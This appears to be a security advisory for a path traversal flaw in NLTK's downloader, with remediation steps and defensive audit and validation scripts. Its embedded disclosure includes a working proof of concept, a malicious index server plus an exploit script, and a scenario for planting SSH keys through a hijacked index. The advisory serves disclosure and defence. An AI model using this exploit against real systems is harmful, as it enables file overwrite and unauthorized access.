NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.
Risk Assessment
High risk for organizations running NLP pipelines, training infrastructure, or shared research environments. CVSS 8.1 is justified: network-accessible, low complexity, no privileges required, and a working PoC exists. The primary exploitation constraint is attacker control of the NLTK index server—achievable via MitM on HTTP traffic, BGP/DNS hijack, or social engineering ML engineers into using malicious custom URLs. Cloud ML environments with unfiltered outbound HTTP (SageMaker, Vertex AI, Azure ML) are particularly exposed. EPSS is low (0.00043) indicating no observed exploitation yet, but the public PoC significantly lowers the barrier to entry.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| nltk | pip | <= 3.9.2 | No patch |
Do you use nltk? You're affected.
Recommended Action
1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`).
2. Patch: No official patched version had been released as of CVE publication; monitor https://github.com/nltk/nltk for a release.
3. Workaround (preferred): Pre-download all required corpora and bake them into container images; disable runtime NLTK downloads in production entirely.
4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines.
5. Audit: Search the codebase for `Downloader(server_index_url=` with non-official URLs, and treat any match as a critical finding requiring immediate remediation.
6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages).
7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
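The inventory step can be partly automated. The following is a minimal sketch, assuming the affected range is exactly the `<= 3.9.2` stated in the table above; the helper names (`version_tuple`, `is_vulnerable`, `installed_nltk_version`) are hypothetical, and the version parsing is deliberately simple (it ignores pre-release and post-release suffixes).

```python
import re
from importlib import metadata

# Assumption: last vulnerable release, taken from the advisory's "<= 3.9.2" range.
LAST_VULNERABLE = (3, 9, 2)


def version_tuple(version):
    """Parse the leading numeric components, e.g. '3.9.2' -> (3, 9, 2)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if not match:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = [int(p) for p in match.group(0).split(".")]
    parts += [0] * (3 - len(parts))  # pad '3.9' to (3, 9, 0)
    return tuple(parts)


def is_vulnerable(version):
    """Return True if the version falls inside the advisory's affected range."""
    return version_tuple(version) <= LAST_VULNERABLE


def installed_nltk_version():
    """Return the installed nltk version string, or None if nltk is absent."""
    try:
        return metadata.version("nltk")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_nltk_version()
    if found is None:
        print("nltk is not installed in this environment")
    elif is_vulnerable(found):
        print(f"nltk {found} is within the affected range (<= 3.9.2)")
    else:
        print(f"nltk {found} is outside the affected range")
```

Running this inside each virtual environment or container image gives the same information as `pip show nltk`, in a form that can be collected by a fleet-wide job.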
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2026-33236?
CVE-2026-33236 is a path traversal vulnerability in the NLTK downloader (nltk <= 3.9.2). The downloader does not validate the `subdir` and `id` attributes of remote XML index files, so an attacker who controls the index can create or overwrite files outside the download directory on any machine that downloads NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines that use custom index URLs are the most directly exposed.
Is CVE-2026-33236 actively exploited?
No confirmed active exploitation of CVE-2026-33236 has been reported. Because no patched release is available, organizations should still apply the workarounds and hardening steps proactively.
How to fix CVE-2026-33236?
1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`).
2. Patch: No official patched version had been released as of CVE publication; monitor https://github.com/nltk/nltk for a release.
3. Workaround (preferred): Pre-download all required corpora and bake them into container images; disable runtime NLTK downloads in production entirely.
4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines.
5. Audit: Search the codebase for `Downloader(server_index_url=` with non-official URLs, and treat any match as a critical finding requiring immediate remediation.
6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages).
7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
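The audit step (searching for `server_index_url=`) could be scripted roughly as follows. This is a sketch under stated assumptions: it only inspects `*.py` files, it matches the keyword textually rather than parsing the code, and the function name `find_index_url_overrides` is hypothetical. Every hit still needs a human to decide whether the URL is an official one.

```python
import re
from pathlib import Path

# Textual match for the keyword argument named in the advisory.
PATTERN = re.compile(r"server_index_url\s*=")


def find_index_url_overrides(root):
    """Return (path, line number, line) for each line that sets server_index_url."""
    hits = []
    for path in sorted(Path(root).rglob("*.py")):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        for lineno, line in enumerate(text.splitlines(), start=1):
            if PATTERN.search(line):
                hits.append((str(path), lineno, line.strip()))
    return hits


if __name__ == "__main__":
    for file_path, lineno, line in find_index_url_overrides("."):
        print(f"{file_path}:{lineno}: {line}")
```

A textual scan will miss URLs assembled at runtime or passed through configuration, so it complements rather than replaces egress controls.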
What systems are affected by CVE-2026-33236?
This vulnerability affects the following AI/ML architecture patterns: NLP training pipelines, data preprocessing pipelines, CI/CD ML pipelines, Jupyter notebook environments, containerized ML workloads.
What is the CVSS score for CVE-2026-33236?
CVE-2026-33236 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.02%.
Technical Details
NVD Description
## Vulnerability Description

The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:

1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system
2. **Arbitrary File Creation**: Create arbitrary files
3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)

## Vulnerability Principle

### Key Code Locations

**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)

```python
self.filename = os.path.join(subdir, id + ext)
```

- `subdir` and `id` are directly from XML attributes without any validation

**2. Path Construction Without Checks** (`nltk/downloader.py:679`)

```python
filepath = os.path.join(download_dir, info.filename)
```

- Directly uses `filename` which may contain path traversal

**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)

```python
os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
```

- Can create arbitrary directories outside the download directory

**4. File Writing Without Protection** (`nltk/downloader.py:695`)

```python
with open(filepath, "wb") as outfile:
```

- Can write to arbitrary locations in the file system

### Attack Chain

```
1. Attacker controls remote XML index server
   ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
   ↓
3. Victim executes: downloader.download('passwd')
   ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
   ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
   ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
   ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
   ↓
8. System file is overwritten!
```

## Impact Scope

1. **System File Overwrite**

## Reproduction Steps

### Environment Setup

1. Install NLTK

```bash
pip install nltk
```

2. Prepare malicious server and exploit script (see PoC section)

### Reproduction Process

**Step 1: Start malicious server**

```bash
python3 malicious_server.py
```

**Step 2: Run exploit script**

```bash
python3 exploit_vulnerability.py
```

**Step 3: Verify results**

```bash
ls -la /tmp/test_file.zip
```

## Proof of Concept

### Malicious Server (malicious_server.py)

```python
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file"
             subdir="../../../../../../../../../tmp"
             url="http://127.0.0.1:8888/test.zip"
             size="100"
             unzipped_size="100"
             unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")


# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        pass


# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")
```

### Exploit Script (exploit_vulnerability.py)

```python
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile


def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")

    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)

    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print(f"✗ Path traversal attack successful!")
    else:
        print(f"\n? File not found, download may have failed")


if __name__ == "__main__":
    exploit()
```

### Execution Results

```
✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
```
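The four code locations above all join untrusted `subdir` and `id` values onto `download_dir` without checking where the result lands. One common way to close this class of bug is to resolve the joined path and confirm it is still inside the base directory before creating or writing anything. The sketch below illustrates that containment check only; it is not the NLTK maintainers' fix, and `safe_package_path` is a hypothetical helper, not part of the NLTK API.

```python
import os


def safe_package_path(download_dir, subdir, pkg_id, ext=".zip"):
    """Join untrusted index attributes onto download_dir, rejecting any escape.

    Raises ValueError if the resolved path is outside download_dir.
    """
    base = os.path.realpath(download_dir)
    # realpath collapses '..' segments and resolves symlinks before the check.
    candidate = os.path.realpath(os.path.join(base, subdir, pkg_id + ext))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(
            f"refusing path outside download directory: {candidate!r}"
        )
    return candidate


if __name__ == "__main__":
    print(safe_package_path("/tmp/nltk_data", "corpora", "brown"))
    try:
        safe_package_path("/tmp/nltk_data", "../../etc", "passwd")
    except ValueError as exc:
        print(f"blocked: {exc}")
```

Checking the resolved path, rather than searching the raw string for `../`, also rejects absolute `subdir` values, which `os.path.join` would otherwise let replace the base directory.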
Exploitation Scenario
An adversary targeting an organization's NLP training pipeline identifies that the pipeline downloads NLTK resources at runtime against an HTTP (non-TLS) index server. The adversary performs a DNS hijack or BGP prefix hijack against the NLTK data hostname, redirecting index requests to a controlled malicious server. The malicious server returns a crafted XML with subdir='../../../.ssh' and id='authorized_keys'. When the nightly training job executes `nltk.download('punkt')`, NLTK constructs the path `download_dir + '../../../.ssh/authorized_keys.zip'`, creates the directory, and writes the attacker's crafted archive. After extraction, the attacker's SSH public key is present in authorized_keys—granting persistent, passwordless access to the ML training server, which typically holds sensitive training data, model artifacts, and credentials for internal APIs and data stores.
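A crafted index like the one in this scenario can be spotted before it reaches the downloader. The following is a rough pre-screening sketch, assuming the index uses `<package>` elements with `id` and `subdir` attributes as shown in the PoC; the function name `suspicious_packages` and the specific checks are illustrative choices, not an NLTK feature. For genuinely untrusted XML, a hardened parser such as `defusedxml` would be a safer choice than the standard-library parser used here.

```python
import xml.etree.ElementTree as ET


def suspicious_packages(index_xml):
    """Return (id, subdir, reasons) for packages whose attributes look unsafe."""
    findings = []
    root = ET.fromstring(index_xml)
    for pkg in root.iter("package"):
        pkg_id = pkg.get("id", "")
        subdir = pkg.get("subdir", "")
        reasons = []
        # An id should be a bare name, never a path.
        if not pkg_id or pkg_id in (".", "..") or "/" in pkg_id or "\\" in pkg_id:
            reasons.append("id is empty or contains a path component")
        # Any '..' segment lets the path climb out of the download directory.
        if ".." in subdir.replace("\\", "/").split("/"):
            reasons.append("subdir contains '..'")
        # Absolute paths (POSIX root or a Windows drive letter) bypass the base.
        if subdir.startswith(("/", "\\")) or (len(subdir) > 1 and subdir[1] == ":"):
            reasons.append("subdir is absolute")
        if reasons:
            findings.append((pkg_id, subdir, reasons))
    return findings


if __name__ == "__main__":
    sample = (
        '<?xml version="1.0"?><nltk_data><packages>'
        '<package id="authorized_keys" subdir="../../../.ssh"/>'
        '<package id="punkt" subdir="tokenizers"/>'
        "</packages></nltk_data>"
    )
    for pkg_id, subdir, reasons in suspicious_packages(sample):
        print(pkg_id, subdir, "; ".join(reasons))
```

Such a check is useful in a proxy or a CI gate that mirrors the index, but it does not replace validating the final path at write time.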
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
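To show how this vector yields the 8.1 base score, here is a small calculator following the base-score equations and metric weights published in the CVSS v3.1 specification. It is a sketch for checking the arithmetic: the names `base_score` and `roundup` are this example's own, and temporal and environmental metrics are not handled.

```python
import math

# Metric weights from the CVSS v3.1 specification.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when Scope is Changed.
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the CVSS v3.1 base score from a vector string."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    exploitability = (
        8.22
        * WEIGHTS["AV"][metrics["AV"]]
        * WEIGHTS["AC"][metrics["AC"]]
        * pr
        * WEIGHTS["UI"][metrics["UI"]]
    )
    iss = 1 - (
        (1 - WEIGHTS["C"][metrics["C"]])
        * (1 - WEIGHTS["I"][metrics["I"]])
        * (1 - WEIGHTS["A"][metrics["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"))  # 8.1
```

For this vector the impact sub-score is about 5.18 and the exploitability sub-score about 2.84; their sum, roughly 8.01, rounds up to 8.1.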
Related Vulnerabilities
| CVE | CVSS | Summary | Same attack type |
|---|---|---|---|
| CVE-2025-59528 | 10.0 | Flowise: Unauthenticated RCE via MCP config injection | Supply Chain |
| CVE-2024-2912 | 10.0 | BentoML: RCE via insecure deserialization (CVSS 10) | Supply Chain |
| CVE-2023-3765 | 10.0 | MLflow: path traversal allows arbitrary file read | Supply Chain |
| CVE-2025-5120 | 10.0 | smolagents: sandbox escape enables unauthenticated RCE | Supply Chain |
| CVE-2026-21858 | 10.0 | n8n: Input Validation flaw enables exploitation | Code Execution |